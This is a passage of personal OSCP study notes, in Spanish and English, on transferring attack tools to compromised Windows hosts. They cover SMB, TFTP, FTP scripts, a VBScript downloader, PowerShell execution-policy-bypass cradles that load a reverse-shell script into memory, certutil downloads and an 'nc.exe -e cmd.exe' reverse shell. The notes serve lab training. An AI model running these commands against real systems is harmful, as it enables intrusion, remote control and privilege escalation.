OSCP Notes logo OSCP Notes

post exploitation

windows file transfer

INDEX

  1. simple webservers
  2. smbserver
  3. tftp
  4. ftp
  5. SCP
  6. VBScript
  7. powershell
  8. upgrade cmd to powershell

0 simple webserver

| python 2.7

python2 -m SimpleHTTPServer

| python3

python3 -m http.server

| ruby

ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"

| php

php -S 0.0.0.0:8888

 

1 Smbsever (impacket)

impacket-smbserver

| kali:

smbserver.py  myshare /tmp/smbshare -smb2

| windows:

net use M: \\<kali-ip>\myshare

| Tmb se puede correr desde smb

\\10.10.10.1\privesc.exe  whoami

 

2 TFTP

Not the ideal file protocol, pero puede estar y lo podemos llegar a usar

hacker

rootkali: mkdir /tftp
root@kali: atftpd --daemon --port 69 \tftp\
root@kali: cp nc.exe \tftp

| target

C:ProgramFiles\SLmail\System> tftp -i 192.168.30.5 GET nc.exe

 

3 FTP

es interactivo el de windows, asi que no vamos a poder, pero el server ftp de windwos nos deja usar scripts :D

| hacker

root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp

comands a poner en el archivo:

root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

| target

C:\programs files\slmail\System>  cop pyasteamos lo que esta aca arriba y deberia ejecutar todo

 

4 SCP

scp <fileToUpload> user@remote:/path

 

5 VBScript

para windows mas viejos

| script

  echo strUrl = WScript.Arguments.Item(0) > wget.vbs
  echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

  echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
  echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
  echo Err.Clear >> wget.vbs

  echo Set http = Nothing >> wget.vbs
  echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
  echo If http is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
  echo If http is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs

  echo If http is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
  echo http.Open "GET", strUrl, False >> wget.vbs
  echo http.Send >> wget.vbs

  echo varByteArray = http.ResponseBody >> wget.vbs
  echo Set  http = Nothing >> wget.vbs
  echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
  echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs

  echo strData = "" >> wget.vbs
  echo strBuffer = "" >> wget.vbs
  echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

  echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
  echo Next >> wget.vbs
  echo ts.Close >> wget.vbs

| target

copy pasteamos el script

C:\program>   dir wget.vbs < para ver que se bajo
C:\program> cscript wget.vbs http://192.168.30.5/exploit.exe exploit.exe

 

6 PowerShell

| Download File to path

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"

| desde url en el browser:

echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile

| Download testfile and executes it in the memory

powershell.exe  -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"

|powershell full path:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe

| powershell wget

powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444

wget.psl

| kali

  echo $storageDir = $pwd > wget.psl
  echo $webclient = New-Object System.Net.WebClient >>wget.psl
  echo $url = "http://10.10.14.23:8000/PowerUp.ps1 >> wget.psl
  echo $file = "new-exploit.exe" >>wget.psl
  echo $webclient.DownloadFile($url,$file) >>wget.psl

| target:

C:\programs> copy y pasteo lo de arriba\\
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.psl \\
C:\programs> dir new-exploit.exe\\
 cool\\

 

7 certutils

| windows

certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]